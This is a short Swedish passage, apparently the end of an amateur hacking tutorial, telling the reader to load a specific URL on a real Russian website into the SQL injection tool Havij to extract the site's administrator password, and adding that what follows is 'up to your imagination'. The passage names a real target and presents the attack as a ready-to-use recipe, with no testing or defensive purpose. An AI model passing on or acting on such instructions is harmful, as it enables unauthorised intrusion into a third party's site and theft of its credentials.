Ladda sedan ner Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= klistra in den mottagna länken där. Jag kommer inte att förklara hur man använder Havij och var man laddar ner det; det är inte svårt att hitta. Allt. Du har fått den information du behöver - administratörslösenordet, och sedan är det upp till din fantasi.

P.S. Detta är mitt första försök att skriva något. Ursäkta om något är fel